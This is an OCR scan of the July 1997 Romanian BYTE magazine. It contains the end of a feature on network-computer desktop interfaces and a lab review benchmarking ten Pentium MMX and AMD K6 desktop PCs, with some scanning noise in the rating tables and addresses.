se execută | pe un server Unix...
ei Navigatorul deWeb.
4.0 aplicaţie Windows atată
pe server.
IULIE 1997 BYTE România 53
Cover Story
Adio GUI, salut NUI
rula programe pentru terminale 3270/5250,
programe Unix în mod caracter, aplicaţii
Unix Motif sau orice soft Windows.
Alte interfețe NUI pot face lucruri simi-
lare prin soluţii Java, ca la Tarantella de la
SCO şi dbAnywhere de la Symantec. SCO îşi
împachetează apleturile Tarantella cu un
NUI simplu numit WebTop. Acesta este o
colecţie de apleturi și pagini HTML care
uşurează accesul utilizatorilor din navigator
la sistemele vechi.
Lotus îşi elaborează interfața NUI Kona
Desktop (nu este numele definitiv) în Java.
Ca si Constellation de la Netscape, Kona este
de fapt un navigator care ocupă ecranul și
care permite utilizatorilor să lanseze atât
aplicaţii native, cât şi apleturi Java.
Cu toate că Lotus experimentează încă
modul de prezentare, Kona va avea proba-
bil o bară statică de aplicaţii de partea stângă
a ecranului (ca şi Hot]Java Views şi NC Desk-
top), nu vor fi ferestre suprapuse (ca și la Hot-
Java Views) şi vor fi panouri pentru afişat
informaţii dinamice (ca aproape la toate
NUI). O fereastră pager stil panglică va per-
mite utilizatorilor să trimită şi să primească
mesaje scurte.
Aplicațiile incluse în Kona, asemenea celor
din HotJava Views si NC Desktop sunt ver-
siuni simplificate ale versiunilor complete ce
se execută pe PC. „Acestea sunt versiuni
uşoare ale aplicaţiilor noastre din Smart-
Suite“, explică arhitectul Kona Douglass
Wilson. „Ele sunt destinate celor 80% din-
tre utilizatori care au nevoie doar de 25%
din facilități. Nu aţi oferi acest calcul tabelar
unui analist financiar, el are nevoie probabil
de 1-2-3 sau Excel, dar i-aţi putea oferi acest
editor de text“.
Ulysses Telemedia, un concurent necu-
noscut, dezvolta un alt NUI bazat pe Java
care îmbină prezentarea și comportamentul
interfețelor GUI populare, ca Windows 95
şi Motif. VCOS de la Ulysses arată familiar
1. Panoul de control permite selectarea
între stilul Windows 95, Unix CDE si Motif.
2. Utilizatorii pot avea patru suprafeţe
desktop independente pe care le pot
comuta prin selecţie de la panou.
SoftNC 100% Java
desktop. ae
SoftNC de la TriTeal este scris complet in Java si isi poate schimba
instantaneu prezentarea pentru a simula trei interfete GUI clasice.
3. Administratorul de fișiere seamănă cu
un navigator Web.
4. Utilizatorii pot executa apleturi Java sau
aplicaţii native pe desktop.
pentru oricine are experienţă pe PC, dar
schimbă în mod subtil prezentarea și com-
portamentul suprafeței desktop.
SoftNC de la TriTeal are un panou de con-
trol care permite utilizatorilor să opteze între
trei stiluri diferite: Windows 95. Unix/Motif
şi Unix CDE (Common Desktop Environe-
ment). Întreaga suprafaţă de lucru se modi-
fică instantaneu atunci când selectaţi o
INFORMAȚII UTILE
Apple Computer 800-426-9400 800-726-8649
Cupertino, CA 206-882-8080 408-425-7222
800-776-2333 http://www.microsoft.com/ http://tarantella.sco.com/
408-996-1010 backoffice/sbc/sbe_summary Sun/JavaSoft
= i i -htm
ney tenn apni enmy Hid Mountain View, CA
IBM Corp. Netscape Communications 415-960-1300
Austin, TX Mountain View, CA http://www.javasoft.com/
800-426-3333 800-638-7483 2
914-765-1900 415-254-1900 TriTeal Corp.
http://www.internet.ibm.com/ http://www.netscape.com/ Carlsbad, CA
computers/networkstation/ comprod/tech_preview/index.htmi 800-874-8325
619-930-2077
Lotus Development Corp. Oracle/NCI http://www.softne.triteal.com/
Cambridge, MA Redwood Shores, CA i
800-343-5414 800-633-0596 Ulysses Telemedia
617-577-8500 415-506-7000 sii ping ii
: i ://www.nc.com E
http://kona.lotus.com/ http://www.ne.com/ nadie —
Microsoft Corp. The Santa Cruz Operation
Redmond, WA Santa Cruz, CA
54 BYTE România -lULIE 1997
opţiune, deoarece SoftNC are un mecan-
ism unic de schimbare din mers a interfeței
(vedeţi caseta „Transformarea NUI cu Soft-
NC“).
Clienţi noi, utilizatori noi
Utilizatorii experimentați de PC ar putea găsi
că unele dintre aceste NUI sunt prea limitate,
dar în acest caz NC-ul n-a fost făcut pentru
ei. Aşa cum NC extinde modelul client/ser-
ver la noi tipuri de echipamente client, NUI
pe NC va extinde informatica la noi tipuri
de utilizatori.
Pentru o jumătate de secol, evoluţia cal-
culatoarelor a avut loc de la echipamente
solitare de calcul, la echipamente inteligente
de comunicare. Hard-ul și reţeaua se întâl-
nesc în fine. Acum este timpul ca softul să
recupereze diferenţele și ecranul dumnea-
voastră se va schimba pentru totdeauna.
Tom R. Halfhill este BYTE Senior editor si
locuieşte la San Matteo, CA. Îl puteţi găsi la:
thalfhill@bix.com
[din BYTE, o publicatie McGraw-Hill, Inc.
Adaptare - Darvas Attila]
Târg Internaţional Specializat pentru
Tehnică de calcul, Software, Electronică,
Telecomunicaţii şi Birotică
Palatul Parlamentului,
Centrul Internațional de Conferințe
16 - 20 septembrie 1997
ediţia a IV-a
Sy ae
Reprezentant oficial
in Romania a:
Tel: (40-1) 330.45.49; 330.45.16; Fax: (40-1) 330.46.64
EI.
Putere MMX pentru
PC-uri desktop
nventia microprocesoarelor a
schimbat lumea gi a lansat-o
într-o nouă eră a ascensiunii
continue. Pe măsură ce am tre-
cut de la 8088 la 286 şi apoi la 386, am
presupus că fiecare nouă generaţie de
microprocesoare trebuie să ruleze mai
repede şi să furnizeze performanţe mai
bune. Am crezut că îmbunătățirile în micro-
procesoare vor continua să fie alimentate
printr-o creştere a vitezei tactului, îmbună-
tățirea administrării cache-ului şi opti-
mizarea arhitecturii.
Recent însă, industria microproce-
soarelor a trebuit să se confrunte cu o
realitate rece. Introducerea noilor UCP-uri
care diferă puţin faţă de predecesorii lor
imediaţi a lăsat piaţă confuză. Ca si rezul-
tat, evoluția microprocesorului x86 arată
primele semne de încetineală.
Introducerea din partea Intel a exten-
siei multimedia (MMX) reprezintă prima
expansiune majoră a setului de instrucțiuni
x86 de la 386 încoace. Ea face şi o impor-
tantă declaraţie: calculatoarele CISC sunt
vii şi în putere. Cele 57 de instrucţiuni noi
MMĂX realizează operaţii matematice mul-
tiple pe seturi multiple de date, simultan.
Rezultatul potenţial îl reprezintă pro-
gramele puternice care pot face mai mult,
mai repede şi folosi mai puţine instrucţiuni.
Intel a proiectat instrucțiunile MMX
având în vedere aplicaţiile multimedia.
MMĂ îşi va găsi o largă aplicabilitate în
algoritmii orientaţi pe bit şi byte, folosiţi
in mod tipic de compresiile si decompresii-
le video şi audio, procesarea de imagini şi
renderizare.
Surprinzător, Intel şi-a ales pentru debu-
tul MMX, nu un produs de ultimă oră
cum ar fi Pentium Pro, ci linia stabilizată
(şi mai profitabil) de procesoare Pentium.
În ciuda avantajului evident pentru apli-
caţiile comerciale, Intel a lansat MMX cu
56 BYTE Romania -IULIE 1997
o campanie de piaţă care este orientată decis
către consumatori.
Un domeniu larg
Nu se poate spune că există o lipsă de pro-
ducători dispuși de vânzarea de PC-uri
MMx. Pentru acest Lab Report am adunat
10 sisteme din partea a opt producători.
I-am rugat să furnizeze sisteme desktop
dotate cu procesoare pentium MMX la 200
MHz. Am primit de asemenea un sistem
Pentium MMX la 233 MHz şi un sistem K6
AMD la 200 MHz. Toate sistemele au avut
32 MB RAM şi au rulat Windows 95. De
asemenea, a fost mandator un CD-ROM
drive intern 12x, o placă video PCI cu 4 MB
de memorie şi un disk hard de 3 GB.
Preţurile sistemelor (fără monitor) au
variat de la 1750$ la 2949$. Cartelele de
sunet, modemurile, drive-urile Zip şi alte
echipamente extra, fie n-au fost necesare,
fie n-au fost testate explicit.
Pentru că au fost configurate similar şi
construite în jurul unor UCP-uri identice
(cu excepţia sistemului K6), ar putea reieşi
fără a avea vreo surpriză că aceste sisteme
vor obţine performanţe identice. Fiecare
dintre ele se potriveşte perfect în rolul unui
PC de birou sau pentru acasă. Prin urmare,
pentru a distinge aceste sisteme, am evalu-
Întinzând coarda,
PC-urile MMX combină o
multitudine de performante
cu promisiuni.
De redactorii Byte
at de asemenea caracteristicile şi utilitatea,
incluzând calitatea și cantitatea documen-
tatiei.
Trebuie remarcată absenţa sistemelor din
partea a trei producători consacraţi.
Hewlett Packard a refuzat să furnizeze un
sistem, pretinzând că testele noastre sub-
liniază prea pregnant performanţa sis-
temului atunci când este vorba de realizarea
unei evaluări generale. IBM s-a scuzat pre-
tinzând că nu are PC-uri potrivite pentru
această categorie de produse. Compaq a
afirmat că sistemele sale Pentium MMX nu
vor fi gata în timp util.
Piața
Tehnologia şi performanţa microproce-
soarelor şi a subsistemelor inteligente au
deschis noi orizonturi pentru sistemele de
operare şi aplicaţii. Un cursor animat sau
un clip audio inserat într-un document
Word poate furniza un moment de relaxa-
re, însă ele în cel mai rău caz necesită un Pen-
tium la 200 MHz. Deci, cui îi foloseşte
MMX?
Daca majoritatea aplicatiilor dumnea-
voastra implica Windows 95 standard,
atunci veti fi dezamagiti cu Pentium MMX.
În comparaţie cu Pentium standard rulând
la aceeaşi frecvenţă de tact, veţi sesiza doar
o mică îmbunătăţire a performanţei - de la
10 la 20 de procente. Această se datorează
numai cache-ului L1 de pe cipul Pentium
MMx (de la 16KB la 32KB). Va trebui să
depuneti un efort considerabil pentru a jus-
tifica un sistem MMx nou pentru un câştig
atât de mic.
În prezent, nici Windows 95 sau altă apli-
catie standard de birou nu a fost rescrisă
pentru a folosi avantajele instrucţiunilor
MMĂX. Chiar dacă aceste aplicaţii ar fi fost
redimensionate, procentul din codul lor
care ar realiza o îmbunătăţire semnificativă
a performanţei este minor. Aplicațiile de
ILLUSTRATII: SANDERS/TIKKANEN DESIGN & ILLUSTRATION © 1997
COMPARTIMENT DE UNITATE
Veti avea nevoie de un spatiu mare
pentru unitatile optionale CD-ROM,
banda magnetica si discuri hard.
VENTILARE
SUPLIMENTARA
Sistemele încărcate st
încing repede. Ventila
toarele auxiliare sunt
necesare pentru UCP.-!
uri cu răcire pasivă.
ACCESUSOR ™ =
Accesul nestanjenit
la UC și sloturile
SIMM ușurează
upgrade-urile.
SLOTURI DE EXTENSII ©
Perifericele speciale ne-
cesită sloturi. Un sistem
bun mută funcțiile comu-
ne pe placa de bază, eli-
berând mai multe sloturi.
llustraţia se bazează pe
Gateway 2000 P5-200.
birou, în ciuda faptului că sunt încărcate
împreună cu aplicaţiile multimedia, rulează
bine pe sistemele non Pentium MMX.
Primele aplicaţii serioase care folosesc
MMxX sunt cele ce utilizează prelucrările
grafice complexe, așa cum ar fi Adobe Pho-
toshop şi PhotoDeluxe, Power Goo de la Kai
şi navigatorul WIRL Virtual Reality Mode-
ling Language (VRML) de la Vream. Dacă
prelucrările grafice și rendering-ul reprezintă
o parte importantă a sarcinii dumneavoas-
tră, PC-urile şi aplicaţiile care folosesc MMX
pot furniza îmbunătăţiri serioase ale pro-
ductivităţii. De asemenea și dezvoltatorii
de jocuri 3-D vor aprecia MMX.
4
Problema modernizării
Încă nu există un motiv serios pentru a
înlocui PC-ul actual cu un sistem Pentium
MMĂ. Dacă vreți să cumpăraţi un nou PC
sau să faceţi un upgrade pe termen lung,
atunci ar fi bine să luaţi în serios MMX. În
mod normal diferenţa de preţ între un Pen-
tium mai vechi și un MMX este de câteva
sute de dolari. Dacă veţi folosi un AMD K6
diferenţa de preţ aproape că va dispare.
Chiar dacă aplicaţiile dumneavoastră nu vor
putea folosi direct avantajele MMX, veţi be-
neficia de un cache mărit şi de o arhitectură
îmbunătățită.
Intel planifică să-și încorporeze noile
instrucțiuni MMX în toate UCP-urile
viitoare. Cu toate acestea, microprocesoarele
PĂSTREAZĂ SLOTURILE CURATE
Un sistem bine construit mută porturile,
serial, paralel, tastatura și mouse-ul pe
panoul din spate, deasupra sloturilor
cartelelor de extensie
BACK PANEL
clasice Pentium și Pentium Pro - în curând
înlocuite cu Pentium II - vor rămâne și în
viitor cele mai bine vândute.
Datorită unei baze mari de mașini non-
MMĂ instalate, este aproape sigur că pen-
tru viitorul previzibil toate programele popu-
lare vor fi disponibile în versiuni non-MMX.
In final, va rămâne la latitudinea dezvolta-
torilor de aplicaţii software să decidă dacă
MMxX va deveni o nișă sau un curent tehno-
logic.
Au contribuit
Dorothy Hudson, Project Manager/NSTL
Robert Hummel, freelance writer/BYTE
IULIE 1997 BYTE Romania 57
ricare din cele 10 sisteme desk-
top MMX pe care le-am evalu-
at ar reprezenta o achiziţie valo-
roasă atât pentru lucrul la birou
cât şi acasă. Încărcate cu 32 MB de RAM şi
cu UC-uri de ultimă tehnologie, aceste sis-
teme au obținut performanţe excelente în
aplicaţiile Windows curente. De asemenea,
UC-urile care oferă MMX, promit o bună
rulare a viitoarelor aplicaţii şi sisteme de
Altenativa K6
ntel a inventat, inovat și a controlat evo-
lutia cipurilor x86 de la 8088 la Pentium
Pro. În timp, s-a mai sesizat apariţia unor
intruși, însă în general, ceilalți producători
de cipuri s-au limitat la a ţine trena Intel.
Cu Pentium Pro, optimizat pentru opera-
ţii pe 32 de biţi, pe cheltuiala operaţiilor pe
16 biţi, Intel a depășit softul actual pentru
SO și pentru aplicaţii. Cât timp Pentium a
fost cipul preferat, și-au făcut apariţia o
mulțime de oportunități pentru alte cipuri.
Pentru a-și distinge produsele, Intel a creat
Pentium cu extensia multimedia (MMX).
AMD K6-MMX schimbă însă considerabil
peisajul PC. Introdus la timpul potrivit cu o
putere considerabilă și un preţ competitiv,
K6 ar putea reprezenta prima ameninţare
serioasă la adresa dominației Intel.
Sub capotă
Pe 32 de biţi, K6 atinge performanţele exce-
lente ale Pentium Pro, fără însă a avea înce-
tinirile caracteristice acestuia la rularea apli-
cațiilor pe 16 biți. AMD folosește un proces
pe cinci nivele de 0.35 microni pentru a pro-
duce cipul K6 cu 8.8 milioane de tranzistori.
„Acest cip oferă cel mai mare cache L1: un
cache de 32-KB de date și un cache de 32-
KB pentru instrucțiuni - de două ori mai mare
decât cel al Pentium MMĂX. K6 este disponi-
bil în prezent la un tact de 166, 200 și 233
MHz, versiunile pentru 266- și 300-MHz
fiind așteptate în curând.
„ K6 folosește o microarhitectură super-
scalară RISC86 cu șase linii de prelucrare
paralelă care sunt semnificativ diferite față
de cele ale Pentium sau Pentium Pro.
Microarhitectura K6 decodifica instructiu-
nile x86 în coduri de operaţie RISC86 simple,
de lungime fixă.
Unele tehnici RISC folosite în K6 includ
58 BYTE Romania IULIE 1997
operare specifice MMX.
Pentru majoritatea utilizatorilor, carcase-
le modelate și culorile fistichii au prea puţină
importanță. Daca achizitionati un sistem Pen-
tium la 200 MHz, trebuie să aveţi un singur
obiectiv în minte: performanţa. Prin urmare,
este explicabil procentajul de 60% pe care
l-am oferit performanţei, pentru deter-
minarea câştigătorului categoriei Cel mai
bun.
decodări multiple de instrucțiuni, execuții
într-un singur tact de ceas, execuţii out-of-
order, transferul datelor, execuţii speculati-
ve si redenumiri de regiștri. Suplimentar, K6
implementează o tabelă cu 8192 de intrări
unde se ține evidenţa ramificărilor, un cache
pentru destinația ramificărilor și o stivă pen-
tru adrese de întoarcere, care furnizează o
rata a predictiei mai mare de 95%. K6 conti-
ne de asemenea șapte unităţi de executie ca-
re permit operaţii superscalare într-o con-
ductă cu șase stagii.
Formă și funcţie
Dominația Intel îi permite acestuia să dicteze
standardele - trădând orientarea actuală de
deplasare către cartelele UCP plug-in. Știind
că nu poate pretinde schimbări, compania
AMD și-a părăsit propria orientare pentru
a-și asigura compatibilitatea cu pachetele
existente și standardele de interfață sistem.
K6 folosește o grilă de 321 pini dispusă pe
o capsulă ceramică compatibilă Socket 7.
Producătorii de echipamente originale
(OEM) își pot adapta proiectele actuale pen-
tru a se potrivi cu K6 fără a fi necesar un cost
suplimentar R&D pentru o nouă platformă.
K6 însuși este cu mai ieftin decat alte proce-
soare din generaţia a șasea, datorită în spe-
cial unei dimensiuni compacte.
Sistemele K6 actuale nu sunt perfecte.
Unii producători au semnalat performanţe
video dezamăgitoare. Testele lor au indicat
că cip-seturile existente și BIOS-urile, opti-
mizate pentru Pentium-ul vechi însă nu și
pentru MMX Pentium sau Pentium Il, potsa
retina K6 de la atingerea unei performante
complete. Fără îndoială, când aceste pro-
bleme vor fi eliminate, K6 va reprezenta un
competitor potenţial pentru UCP-urile Intel.
Desigur, performanţa nu reprezintă to-
tul. Pentru a-şi diferenţia sistemele, produ-
cătorii au încercat să-şi adauge noi caracte-
ristici, cum ar fi porturi USB (Universal Seri- -
al Bus) şi compartimente suplimentare pen-
tru unități. Problemele din timpul instalării
şi a configurării acestor mașini , uşurinţa de
acces și modernizările ulterioare reprezintă
de asemenea considerente importante. Din
punctajul pentru Cel mai bun am alocat 20
% pentru caracteristici şi 10 % pentru utili-
tate, care atunci când este combinată cu cele
5 % pentru valoare formează punctajul pen-
tru implementare. Ultimele 5% au fost acor-
date inovaţiilor pe care la aduce sistemul.
Câştigătorul categoriei Cel mai bun a fost
Gateway 2000 P5-200. Desi nu s-a clasat pe
primul loc în nici unul din benchmark-uri-
le de testare, punctajele pe care le-a obţinut
s-au situat de fiecare dată aproape de top în
fiecare categorie. Aceasta i-a permis ca în
final să ocupe locul fruntaș, la o diferență
foarte mică de următorul clasat care a fost
Poly 5200Tx de la Polywell Computers.
Acesta a obţinut cele mai bune rezultate atât
în testele Excel cât şi în cele Word. Punctajul
obținut de MicroFLEX-MMX/200 de la
Micro Express, datorită unei performanţe
constante şi a unor funcții ceva mai bune i-a
permis obținerea unei poziţii virtual iden-
tice cu cea a sistemului Polywell.
Singurul sistem K6 pe care l-am testat, Xi
K200 MTower de la Xi Computer, a obti-
nut un punctaj aproape identic cu cel obti-
nut de sistemul Pentium MMX omolog. În
testele individuale, sistemul K6 s-a compor-
tat mai bine în special în mediile integrate,
cum ar fi cele care rulează Word, FoxPro şi
sarcini pentru sub-sisteme video. Am luat
acest sistem şi i-am înlocuit procesorul K6
cu un Pentium MMĂ; această configuraţie
s-a comportat mai bine atunci când s-au
rulat teste Excel sau benchmark-uri MMX.
Sincer, am fost surprinşi să vedem o vari-
ație atât de mare în punctajele pentru bench-
mark-ul MMX Intel. Rezultatele nu prezen-
tau nici o corelaţie cu sistemul video sau vi-
teza procesorului. Unii producători au spe-
cificat faptul că multe BIOS-uri şi implemen-
tări de cip-seturi au eşuat în executarea unor
tehnici de accelerare video, cum ar fi stoca-
rea unor cadre VGA, negând parţial avanta-
jul instrucţiunilor MMX. Sistemele constru-
ite în jurul acestor componente ar putea eşua
FOTOGRAFII: LIGHTWORKS PHOTOGRAPHIC O 1997
CEL MAI BUN
Gateway 200 P5-200
Într-o cursă foarte strânsă, sistemul Gateway a obţinut în mod
constant punctaje bune la toate categoriile, ceea ce l-a ajutat să
obţină primul loc în categoria Cel mai bun. Rezultatele bune ob-
ţinute de sistemul de la Polywell în performanţă şi utilitate, a de-
păşit sistemul Micro Express în ciuda unui punctaj mai bun al
acestuia la caracteristici. Ambele sisteme au fost suficient de apro-
piate ca să fie premiate împreună pe locul doi, cu doar 3 procente
în urma lui P5-200. Locul trei a fost ocupat de Quin-55M/PM233 Tehnologi
de la DTK Computer. Performanţă oricărui sistem din cele 10
APRECIERE
Caracteristici
Valoare
testate s-a încadrat într-o variaţie de 6% a mediei generale.
PRET
Gateway 2000 P5-200 $2124
Polywell Poly 5200Tx $1750
Micro Express MicroFLEX- $2295
MMX/200
DTK Quin-55M/PM233 $2050
Micron Electronics Millennia $2628
MXE P200
Performanta
TEHNOLOGIE IMLEMENTARE PERFORMANTA CARCACTERISTICI UTILITATE. ă APRECIERE GENERALĂ
AAA AAA Aki AA Aki AAA Aki
Ai tok tok tt AAA Ai AAA
AAA Aki tot totek toto tok AAA AAA
AAA totok AAA AAA AAA AAA
Ai kkk tok kkk AAA AAA AAA
APRECIERE
PREȚ REDUS (CEL MAI BUN)
Poly 5200Tx de la Polywell Computers
Pretul redus de 1750$ al Poly 5200Tx l-a lansat pe orbita casti-
gătoare a sistemului cu preţul cel mai mic. El a fost ajutat de bu-
nele rezultate obţinute la performanţă şi utilitate, depășind cu
puţin rezultatele obținute de Quin-55M/PM200 de la DTK
Computer, care de asemenea reprezintă un chilipir la 1775$. Caracteristici
Preţul de 1899$ al K200 MTower de la Xi l-a ajutat pe acesta
„să depăşească unele lipsuri în punctajul caracteristicilor $i al utili-
tăţii şi să obţină locul trei. Având punctajele generale aproape
Performanta
Utilitate
egale, nu trebuie să mire faptul că aceste sisteme, cu un preţ sub
2000 $, au fost desemnate ca și lideri ai preţului redus.
PRET TEHNOLOGIE IMPLEMENTARE PERFORMANTA CARACTERISTICI
Polywell Poly 5200Tx $1750 xxx tok tok tk tot bok
DTK Quin-55M/PM200 $1775 © AAA Ai AAA kkk
XI K200 MTower $1 899 AAA AAA Ai AAA
Gateway 2000 P5-200 $2124 AAA AAA tk Kk tooth tok
DTK Quin-55M/PM233 $2050 AAA totok AA Ai kak tok tok AAA
AA 4 AA Excepţional AAA Foarte bine xxx Bine A Acceptabil x Slab
în deservirea completă a potenţialului MMX,
chiar și atunci când sunt disponibile noi apli-
caţii. Digital Equipment în mod aparent a
depăşit această problemă particulară. Al său
Celebris FX-2 5200M LP a obţinut cel mai
bun punctaj în benchmark-ul MMX, deşi în
final s-a clasat doar pe locul şase.
Reducerea costurilor
Am putea fi tentaţi de performanţele strălu-
citoare şi caracteristicile la modă, însă preţul
ne readuce la realitate. Competiţia care
există între producătorii de PC-uri pentru
acapararea pieţei de desfacere este dură. Trei
sisteme din această evaluare au ilustrat fap-
tul că înalta performanță poate fi obținută
şi cu un buget relativ mic.
Pentru a alege câștigătorul la categoria cel
mai mic preţ, ne-am comutat priorităţile
pentru a scoate în evidenţă preţul. Ela deter-
minat 50% din punctajul general. Am alo-
cat 20% din scorul general pentru caracte-
ristici şi alte 20% pentru performanță.
Utilitatea a ocupat celelalte 10%.
Preţul de 1750$ al Polywell Poly 5200Tx
şi locul secund în categoria Cel mai bun, îl
fac de departe cea mai bună investiţie. În
urma lui - conform unei evaluări statistice
foarte strânse - Quin-55M/PM200 de la
DTK Computer s-a bucurat de onoarea de
a fi catalogat ca fiind al doilea cel mai ieftin
din grup. În final, K200 MTower de la Xi,
singura mașină K6, şi-a ameliorat scorul
redus la caracteristici și utilitate cu un preţ
de chilipir.
JULIE 1997 BYTE Romania 59
Waţi încălzit?
Setea pentru diferit
în timp ce unii producători livrează sisteme turn, Digital oferă un PC cu profil
| mic care se va potrivi convenabil sub monitorul dvs. Porturile de reţea, video și
I/O de pe placa de bază
economisesc spaţiu și
sloturi. Cu toate acestea,
nu e bine să vă ambitio-
naţi prea tare înainte ca
cele două sloturi de ex-
tensie și lipsa de com-
partimente pentru uni-
tati ale Celebris sa va
intepeneasca stilul.
TECH FOCUS
Atentie: Exagerare de marketing
Aţi navigat prin anunţuri, aţi citit reviste și aţi urmărit reclame TV. Însă
doar daca ati insistat asupra manualelor tehnice, v-aţi făcut probabil
o idee solidă asupra ceea ce înseamnă tehnologia multimedia (MMX)
oferită de Intel.
A numi MMĂ tehnologie e ca și cum aţi descrie un șurub pentru lemn
ca fiind un mecanism de fixare bifurcat elicoidal. MMX este pur și sim-
plu un grup de instrucțiuni noi pe care Intel le-a proiectat pentru a
„realiza sarcini utile în aplicaţiile multimedia. Intel a numit aceste
instrucțiuni tehnologia MMX, deoarece nimeni n-ar fi luat-o în seamă
dacă ar fi fost numită „Pentium - Acum cu 57 de instrucţiuni noi”.
În ciuda exagerării, instrucțiunile MMX reprezintă o modernizare
semnificativă a setului de instrucțiuni x86, prima de la introducerea
lui 386. Pe baza analizării unor algoritmi realizaţi în timpul prelu-
crărilor de grafică și imagini, a afișării video, sintetizării muzicale și în
procesarea vorbirii, instrucțiunile MMX reprezintă cel mai bun rezul-
tat pe care Intel I-a putut depune pentru încapsularea unor execuţii
multiple în câteva instrucțiuni.
MASCARADA DATELOR |
Pentru a-și crea spaţiu de lucru, UC-ul MMX folosește pseudonime
pentru cluster-ele de registre dedicate operaţiilor în virgulă mobilă.
În locul vizualizării acestor registre ca și cum ar conține numere în vir-
gulă mobilă, instrucțiunile MMĂX le tratează ca și opt valori întregi pe
8 biți. Când este executată o instrucțiune MMX, ea preia toate cele
optvalori din registrele MMX, face si aes in paralel si scrie rezul-
tatul in alt registru MMX.
60 BYTE Romania IULIE 1997
N oile cipuri MMX generează mai puţină
căldură decât vechile cipuri Pentium, însă
ele lucrează încins. Deoarece sistemul de con-
vecţie ventilează UC-ul, sunt necesare radia-
toare și o cutie închisă pentru a obține un cu-
rent de aer adecvat. Un radiator montat pe UC
reduce atât curentul de aer necesar, cât și zgo-
motul ventilatorului, însă nu răcește cutia.
Cipurile favorite
eee pentru a fi montat într-un soclu Pen-
tium, AMD K6 permite producătorilor o mo-
dalitate simplă de-a oferi compatibilitate MMX. K6
permite performanţe excelente pentru softuri pe
16 și 32 de biţi, oferind o platformă superbă pentru
bagajul complex de aplicaţii de birou. În plus, dacă
achiziționaţi un K6 puteţi economisi câteva sute de
dolari din nota de plată a viitorului sistem.
CE ESTE MMX?
S-ar putea spune că modul de lucru al instructiunilor MMX cu regis-
trele în virgulă mobilă ar putea cauza incompatibilitate sau un conflict
cu modul normal de utilizare matematică. Din fericire, softul bine scris
ia întotdeauna în calcul că altcineva folosește hard-ul în virgulă mobilă
și îi păstrează starea înainte de comutarea de la o sarcină la alta.
NU ESTE HARDWARE
Nu uitaţi că MMX reprezintă totuși o soluţie software. Un coprocesor
extern, cum ar fi un accelerator video sau un procesor de semnal digi-
tal (DSP) de pe o placă de sunet își poate realiza funcţiile în mod inde-
pendent de UC-ul PC-ului, multiplicând întreaga putere a sistemului.
În schimb, atunci când UC-ul execută instrucțiuni MMĂ, el nu mai
poate face și altceva în același timp.
Utilizarea globală a UC-ului va crește pe măsură ce tot mai multe
instrucțiuni MMĂ sunt utilizate, până ce eventual performanţa siste-
mului se degradează. Singurul câștig potenţial apare când calculele
non-MMX bazate pe UC pot fi organizate prin folosirea instrucţiunilor
MMX.
De asemenea, e bine de amintit că nici un SO actual nu recunoaște
sau exploatează UC-urile capabile MMX. Un SO care recunoaște MMX
va comuta spre exemplu driver-ele de dispozitiv sau codul nucleu când
va detecta un UC MMĂX. Altfel, pentru fiecare aplicaţie producătorul
trebuie să realizeze în mod individual transformarea MMX. În acest
mod, necesitatea dea crea două seturi de software pentru fiecare pro-
dus și o lipsă de unelte MMX larg răspândite vor determina o tranziție
MMX lentă.
Sc
cumpăra un PC desktop cu
extensii multimedia (MMX)
pentru a rula aplicaţii medii are
sens doar dacă sunteţi dornici
de o modernizare. Cache-ul mare şi arhi-
tectura îmbunătățită oferită de Pentium
MMĂ şi posibilele îmbunătăţiri în BIOS-ul
şi cip-setul sistemului ar reprezenta destule
motive de performanţă pentru a justifica un
cost suplimentar față de un Pentium nor-
mal. Cu toate acestea, până ce vor sosi noi
aplicaţii cu facilități MMX sau până ce
instrucţiunile MMX vor fi încorporate în
Windows, noul sistem nu-şi va atinge ade-
văratul potenţial.
Pentru a testa performanţa am folosit o
suită de benchmark-uri individuale. Trei
sunt bazate pe aplicaţii rulând sarcini sub
Microsoft Word, Excel şi FoxPro. Testul
InterMark proprietar NSTLa măsurat per-
formanţa sistemului. În final am folosit
benchmark-ul MMX al Intel. Am rulat
toate testele sub Windows 95.
“Testul Word a realizat mai multe opera-
tii care au simulat o prelucrare intensivă a
textelor. Testul I/O pentru fişiere a solici-
tat discul hard al sistemului. Insert, Paste,
Select şi Format au testat capacitatea video.
Testele Calculation, Compare şi Sort au
măsurat în primul rând eficiența proce-
sorului şi a memoriei.
Testul Excel a solicitat calcularea în vir-
gulă mobilă şi administrare. Testele Clear,
Insert, Delete, Paste şi Screen solicită sub-
sistemul video al sistemului. Testul Calcu-
lation măsoară eficienţa procesorului şi a
discului hard, în timp ce testul I/O pentru
fişiere solicită discul hard al sistemului.
Benchmark-ul pentru FoxPro 2.6 for
Windows foloseşte cinci tabele de baze de
date: conexiuni, cărți, autori, comenzi și
intrări. Testul rulează Extended Edition
FoxPro care foloseşte pentru cache memo-
ria extinsă disponibilă a sistemului. Bench-
mark-ul FoxPro solicită procesarea, discul
hard şi memoria.
Benchmark-ul InterMark al NSTL face
un profil al aplicaţiei prin capturarea
apelurile și acţiunilor sistem. Apoi Inter-
Mark reinterpretează aceste acțiuni pentru
a testa componentele sistemului fără a fi
nevoie de aplicaţii terţe. Un timer precis
de evenimente măsoară timpul de răspuns
pentru fiecare task. NSTL a folosit com-
ponentele video, disc hard, UC şi CD-ROM
din setul InterMark pentru a testa aceste
PC-uri MMĂX.
Am împărţit testele video în trei cate-
gorii: imagini Windows draw, imagini
bitmap şi non-bitmap. Testele de Windows
draw utilizează apelurile Windows API pen-
tru a desena imagini care includ text, o poză
în format WMEF, linii orizontale şi verticale,
pătrate şi elipse. Imaginile sunt apoi-mărite
deunu, unu jumate și două ori dimensiunea
iniţială.
Testele de disc măsoară viteza de citire şi
La un pret de 1750$, Poly 5200Tx de la Polywell Computers
editare fotografie cu Adobe PhotoDeluxe,
redare video clip Intel Indeo, redarea unui
fişier codificat MPEG-1, un joc care uti-
lizeaza Direct-3D si prelucrare profesiona-
14 de fotografie cu Adobe PhotShop. Aces-
tea sunt sarcinile obișnuite pentru care a fost
proiectat MMX.
Am evaluat de asemenea sistemul pentru
ușurința utilizării. Listă noastră a inclus un
număr larg de probleme, de la cât de ușor
oferă investiţia cea mai rentabilă.
scriere. Ele simulează activități secvențiale,
secvențiale la debit constant, aleatoare,
aleatoare - localizate și segmentate cu
blocuri de dimensiuni diferite. Rezultatul
este o măsură a timpului mediu de răspuns,
debitului de transfer, transferului în rafale,
timpului de acces aleator şi a utilizării UC
pentru disc.
Testele UC măsoară performanţele pro-
cesorului atât pentru calcule cu întregi cât
şi pentru calcule în virgulă flotantă. Aceste
teste oferă un indice al puterii de calcul a
procesorului. Testele CD-ROM exami-
nează diferite aspecte ale performanţei
unității CD-ROM: timpul activităţii
aleatoare la 500 și 1000 ms, timpul la lucrul
